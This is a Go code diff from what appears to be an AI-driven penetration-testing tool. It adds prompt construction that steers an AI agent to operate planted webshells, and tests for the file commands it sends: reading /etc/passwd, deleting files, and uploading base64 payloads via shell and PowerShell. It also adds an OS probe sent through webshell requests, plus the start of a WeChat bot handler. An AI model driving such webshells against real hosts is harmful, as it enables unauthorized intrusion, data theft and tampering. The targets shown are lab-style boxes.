WebshellSkillHintDefault + } + + var b strings.Builder + b.Grow(512 + len(userMsg)) + + b.WriteString("[WebShell 助手上下文] 连接 ID:") + b.WriteString(conn.ID) + b.WriteString(",备注:") + b.WriteString(remark) + b.WriteByte('\n') + + // 目标系统:明确告诉 AI 能用/不能用的命令集,避免它对着 Windows 发 ls/cat/rm + b.WriteString("- 目标系统:") + b.WriteString(describeTargetOSForPrompt(targetOS)) + b.WriteByte('\n') + + // 响应编码:仅在非 auto 时显式告知,auto 模式由后端自适应,不打扰模型 + if encHint := describeEncodingForPrompt(encoding); encHint != "" { + b.WriteString("- 响应编码:") + b.WriteString(encHint) + b.WriteByte('\n') + } + + // 工具清单 & connection_id 约束:保持旧有表达,AI 已熟悉 + b.WriteString("可用工具(仅在该连接上操作时使用,connection_id 填 \"") + b.WriteString(conn.ID) + b.WriteString("\"):") + b.WriteString(webshellAssistantToolList) + b.WriteString("。边渗透边记录:每确认新认知即 upsert_project_fact,每验证漏洞即 record_vulnerability,勿等会话结束。") + b.WriteString(skillHint) + b.WriteString("\n\n用户请求:") + b.WriteString(userMsg) + + return b.String() +} + +// describeTargetOSForPrompt 返回某个 OS 对应的中文描述 + 推荐命令集 + 反例, +// 命令列表覆盖文件管理最常用的 6 类动作(查看/读/删/改名/建目录/查找),让 AI 能直接照抄。 +func describeTargetOSForPrompt(targetOS string) string { + switch targetOS { + case "windows": + return "Windows(推荐 cmd/PowerShell:dir /a、type、del /q /f、move /y、md、ren;" + + "查找文件用 `dir /s /b 过滤词` 或 PowerShell `Get-ChildItem -Recurse`;" + + "避免 ls / cat / rm / mv / find 等 Unix 命令,否则将返回 `不是内部或外部命令`)" + case "linux": + return "Linux/Unix(推荐 sh/bash:ls -la、cat、rm -f、mv、mkdir -p;" + + "查找文件用 `find /path -name '*pattern*'`;" + + "避免 dir、type、del、move 等 Windows 命令)" + default: + // 理论上不会走到这里,resolveWebshellOS 已经兜底 + return "未知(请先执行 `uname || ver` 探测再决定命令集)" + } +} + +// describeEncodingForPrompt 返回响应编码的人类可读描述;auto 返回空串以减少 token。 +func describeEncodingForPrompt(encoding string) string { + switch encoding { + case "utf-8": + return "UTF-8(目标原生 UTF-8,无需额外解码)" + case "gbk": + return "GBK(中文 Windows;后端已自动转码为 UTF-8 返回,若仍出现大量 \\uFFFD 替换字符说明命令失败或编码识别错误)" + case "gb18030": + return "GB18030(后端已自动转码为 UTF-8 返回)" + default: + return "" + } +} diff --git a/internal/handler/webshell_context_test.go b/internal/handler/webshell_context_test.go new file mode 100644 index 00000000..743c1a9e --- /dev/null +++ b/internal/handler/webshell_context_test.go @@ -0,0 +1,170 @@ +package handler + +import ( + "strings" + "testing" + + "cyberstrike-ai/internal/database" +) + +func TestBuildWebshellAssistantContext_WindowsExplicit(t *testing.T) { + conn := &database.WebShellConnection{ + ID: "ws_win01", + Remark: "IIS Windows 靶机", + URL: "http://example.com/shell.php", + Type: "php", + OS: "windows", + Encoding: "gbk", + } + got := BuildWebshellAssistantContext(conn, WebshellSkillHintDefault, "列出当前目录并告诉我 flag 在哪") + + mustContain(t, got, + "[WebShell 助手上下文]", + "ws_win01", + "IIS Windows 靶机", + "目标系统:Windows", + "dir /a", + "move /y", + "避免 ls / cat / rm", + "响应编码:GBK", + "后端已自动转码为 UTF-8", + "connection_id 填 \"ws_win01\"", + "webshell_exec、webshell_file_list", + WebshellSkillHintDefault, + "用户请求:列出当前目录并告诉我 flag 在哪", + ) + // Windows 场景下不应出现 Linux 命令推荐 + mustNotContain(t, got, "推荐 sh/bash") +} + +func TestBuildWebshellAssistantContext_LinuxAutoFromPHP(t *testing.T) { + conn := &database.WebShellConnection{ + ID: "ws_lnx01", + Remark: "", // 测试备注为空时 fallback URL + URL: "http://example.com/a.php", + Type: "php", + OS: "auto", // auto + php → linux + Encoding: "", // auto 编码不显式提示 + } + got := BuildWebshellAssistantContext(conn, WebshellSkillHintDefault, "看看 /etc/passwd") + + mustContain(t, got, + "连接 ID:ws_lnx01", + "备注:http://example.com/a.php", // 备注空时 fallback URL + "目标系统:Linux/Unix", + "ls -la", + "mkdir -p", + "避免 dir、type、del、move", + "用户请求:看看 /etc/passwd", + ) + // encoding=auto 不应出现"响应编码:"这一行 + mustNotContain(t, got, "响应编码:") + // Linux 场景不应出现 Windows 命令 + mustNotContain(t, got, "推荐 cmd/PowerShell") +} + +func TestBuildWebshellAssistantContext_AutoFromASPDefaultsToWindows(t *testing.T) { + // 保留向后兼容:旧连接没配 os,shellType=asp 时应视为 Windows + conn := &database.WebShellConnection{ + ID: "ws_asp01", + Remark: "老 ASP 靶机", + Type: "asp", + OS: "", // 空串等同 auto + Encoding: "gb18030", + } + got := BuildWebshellAssistantContext(conn, WebshellSkillHintMultiAgent, "查当前用户") + + mustContain(t, got, + "目标系统:Windows", + "响应编码:GB18030", + "后端已自动转码为 UTF-8 返回", + WebshellSkillHintMultiAgent, + ) + // 多代理 skill 文案里没有 DeepAgent,不应混入 default 文案 + mustNotContain(t, got, "DeepAgent") +} + +func TestBuildWebshellAssistantContext_MultiAgentSkillHint(t *testing.T) { + conn := &database.WebShellConnection{ID: "ws_m1", Remark: "x", Type: "php", OS: "linux"} + got := BuildWebshellAssistantContext(conn, WebshellSkillHintMultiAgent, "hi") + mustContain(t, got, WebshellSkillHintMultiAgent) + mustNotContain(t, got, "DeepAgent") +} + +func TestBuildWebshellAssistantContext_DefaultSkillHintFallback(t *testing.T) { + conn := &database.WebShellConnection{ID: "ws_d1", Remark: "x", Type: "php", OS: "linux"} + // skillHint 传空字符串时应回退到 default + got := BuildWebshellAssistantContext(conn, "", "hi") + mustContain(t, got, WebshellSkillHintDefault) +} + +func TestBuildWebshellAssistantContext_UTF8EncodingIsAnnotated(t *testing.T) { + conn := &database.WebShellConnection{ + ID: "ws_u1", Remark: "u", Type: "jsp", OS: "linux", Encoding: "utf-8", + } + got := BuildWebshellAssistantContext(conn, WebshellSkillHintDefault, "hi") + mustContain(t, got, "响应编码:UTF-8", "目标原生 UTF-8") +} + +func TestBuildWebshellAssistantContext_NilConnReturnsUserMsg(t *testing.T) { + // 防御性:conn == nil 时不 panic,直接返回原消息 + got := BuildWebshellAssistantContext(nil, WebshellSkillHintDefault, "just the message") + if got != "just the message" { + t.Errorf("nil conn should return userMsg as-is, got %q", got) + } +} + +func TestDescribeTargetOSForPrompt(t *testing.T) { + cases := map[string][]string{ + "windows": {"Windows", "dir /a", "move /y", "PowerShell"}, + "linux": {"Linux/Unix", "ls -la", "mkdir -p"}, + "": {"未知", "uname"}, // 防御性分支 + } + for in, wants := range cases { + got := describeTargetOSForPrompt(in) + for _, w := range wants { + if !strings.Contains(got, w) { + t.Errorf("describeTargetOSForPrompt(%q) should contain %q, got: %s", in, w, got) + } + } + } +} + +func TestDescribeEncodingForPrompt(t *testing.T) { + cases := map[string]string{ + "utf-8": "UTF-8", + "gbk": "GBK", + "gb18030": "GB18030", + "auto": "", + "": "", + } + for in, want := range cases { + got := describeEncodingForPrompt(in) + if want == "" && got != "" { + t.Errorf("describeEncodingForPrompt(%q) should return empty string, got: %s", in, got) + } + if want != "" && !strings.Contains(got, want) { + t.Errorf("describeEncodingForPrompt(%q) should contain %q, got: %s", in, want, got) + } + } +} + +// ---- 小工具 ---- + +func mustContain(t *testing.T, text string, substrings ...string) { + t.Helper() + for _, s := range substrings { + if !strings.Contains(text, s) { + t.Errorf("expected text to contain %q\n--- text ---\n%s", s, text) + } + } +} + +func mustNotContain(t *testing.T, text string, substrings ...string) { + t.Helper() + for _, s := range substrings { + if strings.Contains(text, s) { + t.Errorf("text should not contain %q\n--- text ---\n%s", s, text) + } + } +} diff --git a/internal/handler/webshell_encoding_test.go b/internal/handler/webshell_encoding_test.go new file mode 100644 index 00000000..f246008a --- /dev/null +++ b/internal/handler/webshell_encoding_test.go @@ -0,0 +1,103 @@ +package handler + +import ( + "testing" + + "golang.org/x/text/encoding/simplifiedchinese" + "golang.org/x/text/transform" +) + +// mustEncode 使用指定编码对 UTF-8 字符串做编码,得到原始字节,用于构造测试输入 +func mustEncode(t *testing.T, s string, enc string) []byte { + t.Helper() + var tr transform.Transformer + switch enc { + case "gbk": + tr = simplifiedchinese.GBK.NewEncoder() + case "gb18030": + tr = simplifiedchinese.GB18030.NewEncoder() + default: + t.Fatalf("unsupported test encoding: %s", enc) + } + out, _, err := transform.Bytes(tr, []byte(s)) + if err != nil { + t.Fatalf("mustEncode(%s) failed: %v", enc, err) + } + return out +} + +func TestNormalizeWebshellEncoding(t *testing.T) { + cases := map[string]string{ + "": "auto", + " ": "auto", + "auto": "auto", + "AUTO": "auto", + "utf-8": "utf-8", + "UTF-8": "utf-8", + "utf8": "utf-8", + "gbk": "gbk", + "GBK": "gbk", + "gb18030": "gb18030", + "big5": "auto", // 未支持的回退到 auto + "anything": "auto", + } + for in, want := range cases { + if got := normalizeWebshellEncoding(in); got != want { + t.Errorf("normalizeWebshellEncoding(%q) = %q, want %q", in, got, want) + } + } +} + +func TestDecodeWebshellOutput_AutoDetectsGBK(t *testing.T) { + // 模拟 Windows 中文 cmd 输出的 GBK 字节流 + want := "用户名 SID 类型" + raw := mustEncode(t, want, "gbk") + + // auto 模式:UTF-8 校验失败后应当回退 GB18030 解码,得到原始中文 + got := decodeWebshellOutput(raw, "auto") + if got != want { + t.Errorf("decodeWebshellOutput(auto) = %q, want %q", got, want) + } + + // 显式 GBK 模式:同样应当正确解码 + got = decodeWebshellOutput(raw, "gbk") + if got != want { + t.Errorf("decodeWebshellOutput(gbk) = %q, want %q", got, want) + } + + // 显式 GB18030 模式:GBK 是 GB18030 子集,也应正确解码 + got = decodeWebshellOutput(raw, "gb18030") + if got != want { + t.Errorf("decodeWebshellOutput(gb18030) = %q, want %q", got, want) + } +} + +func TestDecodeWebshellOutput_PassthroughUTF8(t *testing.T) { + // 已经是 UTF-8 的中文字符串,各模式都应返回原串(不破坏) + want := "hello 世界" + for _, enc := range []string{"", "auto", "utf-8"} { + if got := decodeWebshellOutput([]byte(want), enc); got != want { + t.Errorf("decodeWebshellOutput(%q) passthrough = %q, want %q", enc, got, want) + } + } +} + +func TestDecodeWebshellOutput_ASCIIStable(t *testing.T) { + // 纯 ASCII 在任何模式下都必须保持原样 + want := "whoami\nAdministrator\n" + for _, enc := range []string{"", "auto", "utf-8", "gbk", "gb18030"} { + if got := decodeWebshellOutput([]byte(want), enc); got != want { + t.Errorf("decodeWebshellOutput(%q) ASCII = %q, want %q", enc, got, want) + } + } +} + +func TestDecodeWebshellOutput_EmptyInput(t *testing.T) { + // 空输入直接返回空串,不做额外分配 + if got := decodeWebshellOutput(nil, "gbk"); got != "" { + t.Errorf("decodeWebshellOutput(nil) = %q, want empty", got) + } + if got := decodeWebshellOutput([]byte{}, "auto"); got != "" { + t.Errorf("decodeWebshellOutput([]) = %q, want empty", got) + } +} diff --git a/internal/handler/webshell_os_test.go b/internal/handler/webshell_os_test.go new file mode 100644 index 00000000..5cf47b6b --- /dev/null +++ b/internal/handler/webshell_os_test.go @@ -0,0 +1,348 @@ +package handler + +import ( + "encoding/base64" + "strings" + "testing" + + "go.uber.org/zap" +) + +func newTestWebShellHandler() *WebShellHandler { + return NewWebShellHandler(zap.NewNop(), nil) +} + +func TestNormalizeWebshellOS(t *testing.T) { + cases := map[string]string{ + "": "auto", + " ": "auto", + "auto": "auto", + "AUTO": "auto", + "linux": "linux", + "Linux": "linux", + "windows": "windows", + "WINDOWS": "windows", + "macos": "auto", // 未支持的回退 auto + "solaris": "auto", + } + for in, want := range cases { + if got := normalizeWebshellOS(in); got != want { + t.Errorf("normalizeWebshellOS(%q) = %q, want %q", in, got, want) + } + } +} + +func TestResolveWebshellOS(t *testing.T) { + type testCase struct { + osTag string + shellType string + want string + } + cases := []testCase{ + // 显式 OS:按用户选择,忽略 shellType + {"linux", "asp", "linux"}, + {"windows", "php", "windows"}, + {"LINUX", "jsp", "linux"}, + + // auto + 各种 shellType:asp/aspx → windows,其他 → linux + {"auto", "asp", "windows"}, + {"auto", "aspx", "windows"}, + {"auto", "ASP", "windows"}, + {"auto", "php", "linux"}, + {"auto", "jsp", "linux"}, + {"auto", "custom", "linux"}, + {"auto", "", "linux"}, + + // 空/未知 OS 等价 auto + {"", "asp", "windows"}, + {"", "php", "linux"}, + {"unknown", "aspx", "windows"}, + } + for _, c := range cases { + got := resolveWebshellOS(c.osTag, c.shellType) + if got != c.want { + t.Errorf("resolveWebshellOS(%q,%q) = %q, want %q", c.osTag, c.shellType, got, c.want) + } + } +} + +func TestQuoteCmdPath(t *testing.T) { + cases := map[string]string{ + "": `"."`, + `C:\Windows\Temp`: `"C:\Windows\Temp"`, + `C:\Program Files\a`: `"C:\Program Files\a"`, + `C:\weird"name\f.txt`: `"C:\weird""name\f.txt"`, + `.`: `"."`, + } + for in, want := range cases { + if got := quoteCmdPath(in); got != want { + t.Errorf("quoteCmdPath(%q) = %q, want %q", in, got, want) + } + } +} + +func TestQuoteShellSinglePosix(t *testing.T) { + cases := map[string]string{ + "": ".", + "/tmp/a b": "'/tmp/a b'", + "/tmp/it's.txt": `'/tmp/it'\''s.txt'`, + } + for in, want := range cases { + if got := quoteShellSinglePosix(in); got != want { + t.Errorf("quoteShellSinglePosix(%q) = %q, want %q", in, got, want) + } + } +} + +// TestBuildFileCommand_LinuxBranch 覆盖 Linux 目标下每个 action 产出的命令 +func TestBuildFileCommand_LinuxBranch(t *testing.T) { + h := newTestWebShellHandler() + base := fileCommandInput{OS: "linux", ShellType: "php"} + + mustContain := func(t *testing.T, cmd string, substrings ...string) { + t.Helper() + for _, s := range substrings { + if !strings.Contains(cmd, s) { + t.Errorf("expected command to contain %q, got: %s", s, cmd) + } + } + } + mustNotContain := func(t *testing.T, cmd string, substrings ...string) { + t.Helper() + for _, s := range substrings { + if strings.Contains(cmd, s) { + t.Errorf("command should not contain %q, got: %s", s, cmd) + } + } + } + + // list with empty path defaults to '.' + in := base + in.Action = "list" + cmd, err := h.buildFileCommand(in) + if err != nil { + t.Fatalf("list linux: unexpected err: %v", err) + } + mustContain(t, cmd, "ls -la", "'.'") + + // list with path containing spaces + in.Path = "/tmp/my files" + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "ls -la ", "'/tmp/my files'") + + // read with path + in = base + in.Action = "read" + in.Path = "/etc/passwd" + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "cat ", "'/etc/passwd'") + + // read without path → error + in.Path = "" + if _, err := h.buildFileCommand(in); err != errFileOpPathRequired { + t.Errorf("read empty path: want errFileOpPathRequired, got %v", err) + } + + // delete + in = base + in.Action = "delete" + in.Path = "/tmp/a.txt" + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "rm -f ", "'/tmp/a.txt'") + mustNotContain(t, cmd, "del") + + // mkdir + in.Action = "mkdir" + in.Path = "/tmp/new/sub" + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "mkdir -p ", "'/tmp/new/sub'") + + // rename + in = base + in.Action = "rename" + in.Path = "/tmp/a" + in.TargetPath = "/tmp/b" + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "mv -f ", "'/tmp/a'", "'/tmp/b'") + + // rename missing target → error + in.TargetPath = "" + if _, err := h.buildFileCommand(in); err != errFileOpRenameNeedsBothPaths { + t.Errorf("rename empty target: want errFileOpRenameNeedsBothPaths, got %v", err) + } + + // write + in = base + in.Action = "write" + in.Path = "/tmp/w.txt" + in.Content = "hello 世界" + cmd, _ = h.buildFileCommand(in) + b64 := base64.StdEncoding.EncodeToString([]byte("hello 世界")) + mustContain(t, cmd, "echo '"+b64+"'", "| base64 -d", "> '/tmp/w.txt'") + + // upload + in = base + in.Action = "upload" + in.Path = "/tmp/bin" + in.Content = "YWJjZA==" // base64 of "abcd" + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "echo 'YWJjZA=='", "| base64 -d", "> '/tmp/bin'") + + // upload oversized content → error + in.Content = strings.Repeat("A", 513*1024) + if _, err := h.buildFileCommand(in); err != errFileOpUploadTooLarge { + t.Errorf("upload too large: want errFileOpUploadTooLarge, got %v", err) + } + + // upload_chunk with chunk_index=0 uses single redirect + in = base + in.Action = "upload_chunk" + in.Path = "/tmp/bin" + in.Content = "YWJj" + in.ChunkIndex = 0 + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "base64 -d > '/tmp/bin'") + mustNotContain(t, cmd, ">>") + + // upload_chunk with chunk_index>0 uses append redirect + in.ChunkIndex = 1 + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "base64 -d >> '/tmp/bin'") + + // unsupported action + in = base + in.Action = "nope" + if _, err := h.buildFileCommand(in); err == nil || !strings.Contains(err.Error(), "unsupported action") { + t.Errorf("unknown action: want unsupported action error, got %v", err) + } +} + +// TestBuildFileCommand_WindowsBranch 覆盖 Windows 目标下每个 action 产出的命令 +func TestBuildFileCommand_WindowsBranch(t *testing.T) { + h := newTestWebShellHandler() + base := fileCommandInput{OS: "windows", ShellType: "php"} + + mustContain := func(t *testing.T, cmd string, substrings ...string) { + t.Helper() + for _, s := range substrings { + if !strings.Contains(cmd, s) { + t.Errorf("expected command to contain %q, got: %s", s, cmd) + } + } + } + mustNotContain := func(t *testing.T, cmd string, substrings ...string) { + t.Helper() + for _, s := range substrings { + if strings.Contains(cmd, s) { + t.Errorf("command should not contain %q, got: %s", s, cmd) + } + } + } + + // list + in := base + in.Action = "list" + cmd, _ := h.buildFileCommand(in) + mustContain(t, cmd, "dir /a ", `"."`) + mustNotContain(t, cmd, "ls -la") + + in.Path = `C:\Users\Public Docs` + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "dir /a ", `"C:\Users\Public Docs"`) + + // read + in = base + in.Action = "read" + in.Path = `C:\flag.txt` + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "type ", `"C:\flag.txt"`) + + // delete + in.Action = "delete" + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "del /q /f ", `"C:\flag.txt"`) + mustNotContain(t, cmd, "rm -f") + + // mkdir + in.Action = "mkdir" + in.Path = `C:\a\b\c` + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "md ", `"C:\a\b\c"`) + + // rename + in = base + in.Action = "rename" + in.Path = `C:\a.txt` + in.TargetPath = `C:\b.txt` + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "move /y ", `"C:\a.txt"`, `"C:\b.txt"`) + + // write → PowerShell base64 one-liner + in = base + in.Action = "write" + in.Path = `C:\out.txt` + in.Content = "hello 世界" + cmd, _ = h.buildFileCommand(in) + wantB64 := base64.StdEncoding.EncodeToString([]byte("hello 世界")) + mustContain(t, cmd, + "powershell -NoProfile -NonInteractive -Command", + "[Convert]::FromBase64String('"+wantB64+"')", + "[IO.File]::WriteAllBytes('C:\\out.txt'", + ) + mustNotContain(t, cmd, "echo ", "base64 -d") + + // upload (chunk_index=0 equivalent) uses WriteAllBytes + in = base + in.Action = "upload" + in.Path = `C:\bin\f` + in.Content = "YWJjZA==" + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "WriteAllBytes('C:\\bin\\f'", "FromBase64String('YWJjZA==')") + + // upload_chunk index=0 → WriteAllBytes + in.Action = "upload_chunk" + in.ChunkIndex = 0 + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "WriteAllBytes(") + mustNotContain(t, cmd, "FileMode]::Append") + + // upload_chunk index>0 → append (Open with Append mode) + in.ChunkIndex = 1 + cmd, _ = h.buildFileCommand(in) + mustContain(t, cmd, "[IO.FileMode]::Append", "FromBase64String('YWJjZA==')") +} + +// TestBuildFileCommand_AutoFallbackMatchesLegacyBehavior 确保 os=auto 时与旧版 shellType 判定行为完全一致 +// asp/aspx 视为 Windows(旧行为),其他视为 Linux。 +func TestBuildFileCommand_AutoFallbackMatchesLegacyBehavior(t *testing.T) { + h := newTestWebShellHandler() + + // asp + auto → windows 命令 + cmd, _ := h.buildFileCommand(fileCommandInput{Action: "list", OS: "auto", ShellType: "asp"}) + if !strings.Contains(cmd, "dir /a") { + t.Errorf("auto + asp should use Windows cmd, got: %s", cmd) + } + + cmd, _ = h.buildFileCommand(fileCommandInput{Action: "list", OS: "auto", ShellType: "aspx"}) + if !strings.Contains(cmd, "dir /a") { + t.Errorf("auto + aspx should use Windows cmd, got: %s", cmd) + } + + // php/jsp/custom + auto → linux 命令(与历史行为一致) + for _, st := range []string{"php", "jsp", "custom", ""} { + cmd, _ = h.buildFileCommand(fileCommandInput{Action: "list", OS: "auto", ShellType: st}) + if !strings.Contains(cmd, "ls -la") { + t.Errorf("auto + %q should use Linux cmd, got: %s", st, cmd) + } + } + + // 显式 OS 覆盖 shellType + cmd, _ = h.buildFileCommand(fileCommandInput{Action: "list", OS: "windows", ShellType: "php"}) + if !strings.Contains(cmd, "dir /a") { + t.Errorf("explicit windows should override php shellType, got: %s", cmd) + } + cmd, _ = h.buildFileCommand(fileCommandInput{Action: "list", OS: "linux", ShellType: "asp"}) + if !strings.Contains(cmd, "ls -la") { + t.Errorf("explicit linux should override asp shellType, got: %s", cmd) + } +} diff --git a/internal/handler/webshell_probe.go b/internal/handler/webshell_probe.go new file mode 100644 index 00000000..75917206 --- /dev/null +++ b/internal/handler/webshell_probe.go @@ -0,0 +1,127 @@ +package handler + +import ( + "bytes" + "io" + "net/http" + "strings" + + "go.uber.org/zap" +) + +// webshellOSProbeCommand 探活命令:利用 Windows cmd 与 POSIX shell 对 `%OS%` 展开差异进行判定。 +// - Windows cmd:`%OS%` 被展开为 `Windows_NT`,回显 `:OSPROBE_Windows_NT:END` +// - POSIX sh/bash:`%OS%` 不是变量语法,作为字面量原样保留,回显 `:OSPROBE_%OS%:END` +// +// 一条命令即可得到明确的、互斥的信号,避免探活成本(相比发两次命令)。 +// 冒号包裹是为了避免部分 shell 输出多余空白/BOM 时字符串匹配失效。 +const webshellOSProbeCommand = "echo :OSPROBE_%OS%:END" + +// probeWebshellOSViaExec 通过一次命令执行的回显推断目标操作系统。 +// +// 返回值: +// - "windows" / "linux":识别成功 +// - "":无法判定(调用方应保留既有 fallback 逻辑) +// +// 入参 execFn 是一个"发命令并拿到回显"的闭包;让 HTTP 入口和 MCP 入口可以共用同一套探活逻辑 +// 而不必关心底层是如何发包的。 +func probeWebshellOSViaExec(execFn func(cmd string) (output string, ok bool)) string { + if execFn == nil { + return "" + } + out, ok := execFn(webshellOSProbeCommand) + if !ok { + return "" + } + return classifyWebshellOSProbeOutput(out) +} + +// classifyWebshellOSProbeOutput 纯函数:根据探活命令的回显判定 OS。 +// 抽出来是为了单测可直接覆盖所有分支,无需真实 HTTP 调用。 +func classifyWebshellOSProbeOutput(out string) string { + if out == "" { + return "" + } + lower := strings.ToLower(out) + + // Windows 强信号:cmd.exe 成功展开了 %OS% 变量 + if strings.Contains(out, "Windows_NT") { + return "windows" + } + // 容错:部分老版本 Windows 可能 `%OS%` 展开为其他字样(极少见),再看 PATH/OS 等次级线索 + if strings.Contains(lower, "microsoft windows") { + return "windows" + } + + // Linux/Unix 强信号:`%OS%` 字面量被原样回显,说明 shell 不是 cmd.exe + if strings.Contains(out, "%OS%") { + return "linux" + } + + // 次级线索:部分 webshell 在 Linux 上可能走了其他外壳(如 zsh/ash), + // 但它们对 `%OS%` 同样不展开;若命中 OSPROBE 头部却没拿到 %OS% 字面量, + // 说明回显被中途截断或过滤,保守返回空让上层 fallback。 + return "" +} + +// newHTTPExecFn 为 HTTP FileOp 路径构造"发命令取回显"的闭包,供探活复用。 +// 参数来自 HTTP 请求,复用 buildExecURL / buildExecBody 两个已有的命令编排器, +// 确保探活包与实际文件操作包走完全一致的 webshell 协议(GET/POST、参数名、编码)。 +func (h *WebShellHandler) newHTTPExecFn(targetURL, password, shellType, method, cmdParam, encoding string) func(string) (string, bool) { + useGET := strings.ToUpper(strings.TrimSpace(method)) == "GET" + if strings.TrimSpace(cmdParam) == "" { + cmdParam = "cmd" + } + return func(cmd string) (string, bool) { + var ( + httpReq *http.Request + err error + ) + if useGET { + u := h.buildExecURL(targetURL, shellType, password, cmdParam, cmd) + httpReq, err = http.NewRequest(http.MethodGet, u, nil) + } else { + body := h.buildExecBody(shellType, password, cmdParam, cmd) + httpReq, err = http.NewRequest(http.MethodPost, targetURL, bytes.NewReader(body)) + if err == nil { + httpReq.Header.Set("Content-Type", "application/x-www-form-urlencoded") + } + } + if err != nil { + return "", false + } + httpReq.Header.Set("User-Agent", "Mozilla/5.0 (compatible; CyberStrikeAI-WebShell/1.0)") + resp, err := h.client.Do(httpReq) + if err != nil { + return "", false + } + defer resp.Body.Close() + raw, _ := io.ReadAll(resp.Body) + return decodeWebshellOutput(raw, encoding), resp.StatusCode == http.StatusOK + } +} + +// persistDetectedOS 把探活结果回写到连接表;失败只记日志不阻断主流程。 +// 设计上故意只触发 UPDATE,不会新建记录,因此即便 connectionID 不存在也只是悄悄放弃。 +func (h *WebShellHandler) persistDetectedOS(connectionID, detected string) { + connectionID = strings.TrimSpace(connectionID) + detected = normalizeWebshellOS(detected) + if connectionID == "" || detected == "" || detected == "auto" { + return + } + conn, err := h.db.GetWebshellConnection(connectionID) + if err != nil || conn == nil { + // 不是所有调用方都能提供有效 ID(比如临时测试),这里静默返回 + return + } + if normalizeWebshellOS(conn.OS) != "auto" { + // 用户已经显式选过 OS,尊重用户选择,不自动覆盖 + return + } + conn.OS = detected + if err := h.db.UpdateWebshellConnection(conn); err != nil { + h.logger.Warn("webshell 探活结果持久化失败", zap.String("id", connectionID), zap.String("os", detected), zap.Error(err)) + return + } + h.logger.Info("webshell auto OS 探活成功并持久化", zap.String("id", connectionID), zap.String("os", detected)) +} diff --git a/internal/handler/webshell_probe_test.go b/internal/handler/webshell_probe_test.go new file mode 100644 index 00000000..03917315 --- /dev/null +++ b/internal/handler/webshell_probe_test.go @@ -0,0 +1,68 @@ +package handler + +import "testing" + +func TestClassifyWebshellOSProbeOutput(t *testing.T) { + cases := []struct { + name string + in string + want string + }{ + {"Windows cmd 回显完整", ":OSPROBE_Windows_NT:END\r\n", "windows"}, + {"Windows cmd 回显带额外空行", "\r\n:OSPROBE_Windows_NT:END\r\n", "windows"}, + {"Windows 次级线索 - ver banner", "Microsoft Windows [版本 10.0.19045]\r\n", "windows"}, + {"Linux sh 字面量回显", ":OSPROBE_%OS%:END\n", "linux"}, + {"Linux 紧凑输出(无换行)", ":OSPROBE_%OS%:END", "linux"}, + {"空输出 - 无法判定", "", ""}, + {"被过滤的输出 - 无法判定", "something weird", ""}, + {"仅有 OSPROBE 前缀但被截断 - 保守返回空", ":OSPROBE_:END", ""}, + } + for _, c := range cases { + if got := classifyWebshellOSProbeOutput(c.in); got != c.want { + t.Errorf("case %q: got %q, want %q", c.name, got, c.want) + } + } +} + +func TestProbeWebshellOSViaExec_SendsOneCommandOnly(t *testing.T) { + var calls []string + fn := func(cmd string) (string, bool) { + calls = append(calls, cmd) + return ":OSPROBE_Windows_NT:END", true + } + got := probeWebshellOSViaExec(fn) + if got != "windows" { + t.Fatalf("want windows, got %q", got) + } + if len(calls) != 1 { + t.Fatalf("probe should issue exactly one exec call, got %d: %v", len(calls), calls) + } + if calls[0] != webshellOSProbeCommand { + t.Errorf("probe command mismatch: got %q", calls[0]) + } +} + +func TestProbeWebshellOSViaExec_NotOkReturnsEmpty(t *testing.T) { + // HTTP 非 200 的场景:execFn 返回 ok=false,探活应放弃 + fn := func(cmd string) (string, bool) { return "whatever", false } + if got := probeWebshellOSViaExec(fn); got != "" { + t.Errorf("want empty when exec not ok, got %q", got) + } +} + +func TestProbeWebshellOSViaExec_NilSafeguard(t *testing.T) { + if got := probeWebshellOSViaExec(nil); got != "" { + t.Errorf("nil execFn should return empty, got %q", got) + } +} + +func TestProbeWebshellOSViaExec_LinuxUname(t *testing.T) { + // 某些 webshell 对 `%OS%` 字面量也会过滤(例如安全规则), + // 但主要路径是"%OS% 字面量被原样回显"。这里覆盖标准 Linux 场景。 + fn := func(cmd string) (string, bool) { + return ":OSPROBE_%OS%:END\n", true + } + if got := probeWebshellOSViaExec(fn); got != "linux" { + t.Errorf("Linux case: want linux, got %q", got) + } +} diff --git a/internal/handler/wechat_robot.go b/internal/handler/wechat_robot.go new file mode 100644 index 00000000..93a5ea8f --- /dev/null +++ b/internal/handler/wechat_robot.go @@ -0,0 +1,293 @@ +package handler + +import ( + "context" + "net/http" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/robot/ilink" + + "github.com/gin-gonic/gin" + "github.com/google/uuid" + "go.uber.org/zap" +) + +const wechatLoginTTL = 5 * time.Minute + +// WechatConfigSaver 绑定成功后写入配置并重启机器人连接 +type WechatConfigSaver interface { + ApplyWechatRobotBinding(cfg config.RobotWechatConfig) error +} + +type wechatLoginSession struct { + QRCode string + QRCodeImgURL string + PendingVerify string + CurrentBaseURL string + StartedAt time.Time +} + +// WechatRobotHandler 微信 iLink 机器人(扫码绑定 + 配置) +type WechatRobotHandler struct { + config *config.Config + configSaver WechatConfigSaver + logger *zap.Logger + mu sync.Mutex + logins map[string]*wechatLoginSession +} + +// NewWechatRobotHandler 创建微信机器人处理器 +func NewWechatRobotHandler(cfg *config.Config, saver WechatConfigSaver, logger *zap.Logger) *WechatRobotHandler { + return &WechatRobotHandler{ + config: cfg, + configSaver: saver, + logger: logger, + logins: make(map[string]*wechatLoginSession), + } +} + +func (h *WechatRobotHandler) purgeExpiredLogins() { + now := time.Now() + for k, v := range h.logins { + if now.Sub(v.StartedAt) > wechatLoginTTL { + delete(h.logins, k) + } + } +} + +func (h *WechatRobotHandler) ilinkClient(baseURL string) *ilink.Client { + ver := h.config.Version + if ver == "" { + ver = "1.0.0" + } + 